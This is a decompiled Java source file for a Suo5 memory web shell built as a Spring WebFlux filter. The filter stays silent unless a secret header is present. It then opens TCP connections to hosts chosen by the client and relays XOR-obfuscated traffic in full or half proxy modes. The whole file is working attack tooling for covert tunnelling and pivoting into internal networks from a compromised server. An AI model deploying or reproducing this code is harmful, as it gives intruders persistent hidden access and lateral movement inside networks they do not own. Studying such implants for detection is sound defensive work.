/*
 * Decompiled with CFR 0.152.
 */
package com.reajason.javaweb.memshell.springwebflux.suo5;

import io.netty.channel.ChannelOption;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.lang.reflect.Field;
import java.net.InetSocketAddress;
import java.nio.BufferOverflowException;
import java.nio.ByteBuffer;
import java.util.HashMap;
import java.util.concurrent.atomic.AtomicBoolean;
import java.util.concurrent.atomic.AtomicReference;
import org.reactivestreams.Publisher;
import org.springframework.core.io.buffer.DataBuffer;
import org.springframework.core.io.buffer.DataBufferFactory;
import org.springframework.core.io.buffer.DataBufferUtils;
import org.springframework.http.MediaType;
import org.springframework.http.server.reactive.ServerHttpRequest;
import org.springframework.http.server.reactive.ServerHttpResponse;
import org.springframework.web.server.ServerWebExchange;
import org.springframework.web.server.WebFilter;
import org.springframework.web.server.WebFilterChain;
import reactor.core.publisher.Flux;
import reactor.core.publisher.FluxSink;
import reactor.core.publisher.Mono;
import reactor.core.publisher.Sinks;
import reactor.core.scheduler.Schedulers;
import reactor.netty.Connection;
import reactor.netty.NettyOutbound;
import reactor.netty.tcp.TcpClient;

public class Suo5WebFilter
implements WebFilter {
    public static HashMap ctx = new HashMap();
    public static String headerName;
    public static String headerValue;
    private static int MAX_LEN;

    public Mono<Void> filter(ServerWebExchange exchange, WebFilterChain chain) {
        ServerHttpRequest request = exchange.getRequest();
        ServerHttpResponse response = exchange.getResponse();
        String value = exchange.getRequest().getHeaders().getFirst(headerName);
        if (value == null || !value.contains(headerValue)) {
            return chain.filter(exchange);
        }
        MediaType contentType = request.getHeaders().getContentType();
        if (contentType == null) {
            return chain.filter(exchange);
        }
        if (contentType.toString().equals("application/plain")) {
            return request.getBody().flatMap(databuffer -> response.writeWith((Publisher)Mono.just((Object)databuffer))).then();
        }
        try {
            if (contentType.toString().equals("application/octet-stream")) {
                return this.newfullProxy(request, response);
            }
            return this.newHalfProxy(request, response);
        }
        catch (Exception exception) {
            return Mono.empty();
        }
    }

    private Mono<Void> newfullProxy(ServerHttpRequest request, ServerHttpResponse response) throws Exception {
        response.getHeaders().set("X-Accel-Buffering", "no");
        response.getHeaders().setContentType(MediaType.APPLICATION_OCTET_STREAM);
        Sinks.Many sink = Sinks.many().unicast().onBackpressureBuffer();
        Flux<HashMap<String, byte[]>> dataMaps = this.unmarshal((Flux<DataBuffer>)request.getBody());
        AtomicBoolean handshake = new AtomicBoolean(false);
        AtomicReference<Object> connection = new AtomicReference<Object>(null);
        AtomicReference<Object> out = new AtomicReference<Object>(null);
        dataMaps.doOnComplete(() -> ((Sinks.Many)sink).tryEmitComplete()).mapNotNull(dataMap -> {
            if (!handshake.get()) {
                InetSocketAddress addr;
                byte[] ac = (byte[])dataMap.get("ac");
                if (ac.length != 1 || ac[0] != 0) {
                    sink.tryEmitComplete();
                    return null;
                }
                handshake.set(true);
                String host = new String((byte[])dataMap.get("h"));
                int port = Integer.parseInt(new String((byte[])dataMap.get("p")));
                if (port == 0 && (addr = request.getLocalAddress()) != null) {
                    host = addr.getHostString();
                    port = addr.getPort();
                }
                try {
                    TcpClient client = TcpClient.create().host(host).port(port).option(ChannelOption.CONNECT_TIMEOUT_MILLIS, (Object)3000).doOnConnected(c -> {
                        connection.set(c);
                        out.set(c.outbound());
                        sink.tryEmitNext((Object)this.marshal(this.newStatus((byte)0)));
                    }).doOnDisconnected(s -> sink.tryEmitComplete()).handle((input, output) -> input.receive().asByteArray().flatMap(s -> {
                        sink.tryEmitNext((Object)this.marshal(this.newData((byte[])s)));
                        return Mono.empty();
                    }));
                    client.connect().subscribe(null, e -> {
                        sink.tryEmitNext((Object)this.marshal(this.newStatus((byte)1)));
                        sink.tryEmitComplete();
                    });
                }
                catch (Exception e2) {
                    if (connection.get() != null && !((Connection)connection.get()).isDisposed()) {
                        ((Connection)connection.get()).dispose();
                    }
                    sink.tryEmitNext((Object)this.marshal(this.newStatus((byte)1)));
                    sink.tryEmitComplete();
                }
            } else {
                byte[] action = (byte[])dataMap.get("ac");
                try {
                    byte[] data;
                    if (action == null || action.length != 1 || action[0] == 2) {
                        throw new RuntimeException("remove");
                    }
                    if (action[0] == 1 && (data = (byte[])dataMap.get("dt")).length != 0) {
                        ((NettyOutbound)out.get()).sendByteArray((Publisher)Mono.just((Object)data)).then().subscribe();
                    }
                }
                catch (Exception e3) {
                    if (connection.get() != null && !((Connection)connection.get()).isDisposed()) {
                        ((Connection)connection.get()).dispose();
                    }
                    sink.tryEmitComplete();
                }
            }
            return null;
        }).subscribeOn(Schedulers.boundedElastic()).subscribe();
        return response.writeWith((Publisher)sink.asFlux().map(arg_0 -> ((DataBufferFactory)response.bufferFactory()).wrap(arg_0))).then();
    }

    private Mono<Void> newHalfProxy(ServerHttpRequest request, ServerHttpResponse response) throws Exception {
        response.getHeaders().set("X-Accel-Buffering", "no");
        response.getHeaders().setContentType(MediaType.APPLICATION_OCTET_STREAM);
        Sinks.Many sink = Sinks.many().unicast().onBackpressureBuffer();
        Flux<HashMap<String, byte[]>> dataMaps = this.unmarshal((Flux<DataBuffer>)request.getBody());
        dataMaps.next().subscribeOn(Schedulers.boundedElastic()).subscribe(dataMap -> {
            InetSocketAddress addr;
            if (dataMap == null) {
                sink.tryEmitComplete();
                return;
            }
            String clientId = new String((byte[])dataMap.get("id"));
            byte[] actionData = (byte[])dataMap.get("ac");
            if (actionData.length != 1) {
                sink.tryEmitComplete();
                return;
            }
            byte action = actionData[0];
            if (action == 2) {
                Object[] obj = (Object[])this.remove(clientId);
                if (obj != null) {
                    Connection conn2 = (Connection)obj[0];
                    conn2.dispose();
                }
                sink.tryEmitComplete();
                return;
            }
            if (action == 1) {
                Object[] obj = (Object[])this.get(clientId);
                if (obj == null) {
                    sink.tryEmitNext((Object)this.marshal(this.newDel()));
                } else {
                    byte[] data = (byte[])dataMap.get("dt");
                    if (data.length != 0) {
                        ((NettyOutbound)obj[1]).sendByteArray((Publisher)Mono.just((Object)data)).then().subscribeOn(Schedulers.boundedElastic()).subscribe();
                    }
                }
                sink.tryEmitComplete();
                return;
            }
            if (action != 0) {
                sink.tryEmitComplete();
                return;
            }
            String host = new String((byte[])dataMap.get("h"));
            int port = Integer.parseInt(new String((byte[])dataMap.get("p")));
            if (port == 0 && (addr = request.getLocalAddress()) != null) {
                host = addr.getHostString();
                port = addr.getPort();
            }
            try {
                TcpClient client = TcpClient.create().host(host).port(port).option(ChannelOption.CONNECT_TIMEOUT_MILLIS, (Object)3000).doOnConnected(c -> {
                    this.put(clientId, new Object[]{c, c.outbound()});
                    sink.tryEmitNext((Object)this.marshal(this.newStatus((byte)0)));
                }).doOnDisconnected(s -> {
                    this.remove(clientId);
                    sink.tryEmitComplete();
                });
                client.connect().subscribeOn(Schedulers.boundedElastic()).subscribe(conn -> conn.inbound().receive().asByteArray().flatMap(s -> {
                    sink.tryEmitNext((Object)this.marshal(this.newData((byte[])s)));
                    return Mono.empty();
                }).then().subscribe(), err -> {
                    sink.tryEmitNext((Object)this.marshal(this.newStatus((byte)1)));
                    sink.tryEmitComplete();
                });
            }
            catch (Exception exception) {
                // empty catch block
            }
        });
        return response.writeWith((Publisher)sink.asFlux().map(arg_0 -> ((DataBufferFactory)response.bufferFactory()).wrap(arg_0))).then();
    }

    private HashMap newData(byte[] data) {
        HashMap<String, byte[]> m = new HashMap<String, byte[]>();
        m.put("ac", new byte[]{1});
        m.put("dt", data);
        return m;
    }

    private HashMap newDel() {
        HashMap<String, byte[]> m = new HashMap<String, byte[]>();
        m.put("ac", new byte[]{2});
        return m;
    }

    private HashMap newStatus(byte b) {
        HashMap<String, byte[]> m = new HashMap<String, byte[]>();
        m.put("s", new byte[]{b});
        return m;
    }

    byte[] u32toBytes(int i) {
        byte[] result = new byte[]{(byte)(i >> 24), (byte)(i >> 16), (byte)(i >> 8), (byte)i};
        return result;
    }

    int bytesToU32(byte[] bytes) {
        return (bytes[0] & 0xFF) << 24 | (bytes[1] & 0xFF) << 16 | (bytes[2] & 0xFF) << 8 | (bytes[3] & 0xFF) << 0;
    }

    synchronized void put(String k, Object v) {
        ctx.put(k, v);
    }

    synchronized Object get(String k) {
        return ctx.get(k);
    }

    synchronized Object remove(String k) {
        return ctx.remove(k);
    }

    byte[] copyOfRange(byte[] original, int from, int to) {
        int newLength = to - from;
        if (newLength < 0) {
            throw new IllegalArgumentException(from + " > " + to);
        }
        byte[] copy = new byte[newLength];
        int copyLength = Math.min(original.length - from, newLength);
        for (int i = 0; i < copyLength; ++i) {
            copy[i] = original[from + i];
        }
        return copy;
    }

    private byte[] marshal(HashMap m) {
        try {
            ByteArrayOutputStream buf = new ByteArrayOutputStream();
            Object[] keys = m.keySet().toArray();
            for (int i = 0; i < keys.length; ++i) {
                String key = (String)keys[i];
                byte[] value = (byte[])m.get(key);
                buf.write((byte)key.length());
                buf.write(key.getBytes());
                buf.write(this.u32toBytes(value.length));
                buf.write(value);
            }
            byte[] data = buf.toByteArray();
            ByteBuffer dbuf = ByteBuffer.allocate(5 + data.length);
            dbuf.putInt(data.length);
            byte key = (byte)(Math.random() * 255.0 + 1.0);
            dbuf.put(key);
            for (int i = 0; i < data.length; ++i) {
                data[i] = (byte)(data[i] ^ key);
            }
            dbuf.put(data);
            return dbuf.array();
        }
        catch (Exception e) {
            e.printStackTrace();
            return new byte[0];
        }
    }

    private Flux<HashMap<String, byte[]>> unmarshal(Flux<DataBuffer> inFlux) {
        ByteBuffer[] buffers = new ByteBuffer[]{ByteBuffer.allocate(2048)};
        return Flux.create(sink -> inFlux.doOnComplete(() -> ((FluxSink)sink).complete()).subscribeOn(Schedulers.boundedElastic()).subscribe(dataBuffer -> {
            try {
                ByteBuffer buffer = buffers[0];
                ByteBuffer byteBuffer = dataBuffer.asByteBuffer().asReadOnlyBuffer();
                while (byteBuffer.hasRemaining()) {
                    byte b = byteBuffer.get();
                    try {
                        buffer.put(b);
                    }
                    catch (BufferOverflowException e) {
                        ByteBuffer newBuffer = ByteBuffer.allocate(buffer.capacity() * 2);
                        buffer.flip();
                        newBuffer.put(buffer);
                        buffer = newBuffer;
                        buffers[0] = newBuffer;
                        buffer.put(b);
                    }
                    buffer.flip();
                    if (this.isCompleteMessage(buffer)) {
                        HashMap<String, byte[]> result = this.processCompleteMessage(buffer);
                        sink.next(result);
                        buffer.compact();
                        continue;
                    }
                    buffer.position(buffer.limit());
                    buffer.limit(buffer.capacity());
                }
            }
            catch (Exception e) {
                sink.complete();
            }
            finally {
                DataBufferUtils.release((DataBuffer)dataBuffer);
            }
        }, e -> sink.complete()));
    }

    private boolean isCompleteMessage(ByteBuffer buffer) {
        if (buffer.remaining() < 5) {
            return false;
        }
        int len = buffer.getInt(buffer.position());
        return buffer.remaining() >= 5 + len;
    }

    private HashMap<String, byte[]> processCompleteMessage(ByteBuffer buffer) throws Exception {
        int vLen;
        int len = buffer.getInt();
        byte x = buffer.get();
        if (len > MAX_LEN) {
            throw new IOException("invalid len");
        }
        byte[] bs = new byte[len];
        buffer.get(bs);
        for (int i = 0; i < bs.length; ++i) {
            bs[i] = (byte)(bs[i] ^ x);
        }
        HashMap<String, byte[]> m = new HashMap<String, byte[]>();
        for (int i = 0; i < bs.length - 1; i += vLen) {
            short kLen;
            if (++i + (kLen = (short)bs[i]) >= bs.length) {
                throw new Exception("key len error");
            }
            if (kLen < 0) {
                throw new Exception("key len error");
            }
            byte[] keyBytes = this.copyOfRange(bs, i, i + kLen);
            String key = new String(keyBytes);
            if ((i += kLen) + 4 >= bs.length) {
                throw new Exception("value len error");
            }
            byte[] vLenBytes = this.copyOfRange(bs, i, i + 4);
            vLen = this.bytesToU32(vLenBytes);
            if (vLen < 0 || (i += 4) + vLen > bs.length) {
                throw new Exception("value error");
            }
            byte[] value = this.copyOfRange(bs, i, i + vLen);
            m.put(key, value);
        }
        return m;
    }

    public static Object getFieldValue(Object obj, String fieldName, boolean superClass) throws Exception {
        Field f = superClass ? obj.getClass().getSuperclass().getDeclaredField(fieldName) : obj.getClass().getDeclaredField(fieldName);
        f.setAccessible(true);
        return f.get(obj);
    }

    static {
        MAX_LEN = 0x2000000;
    }
}

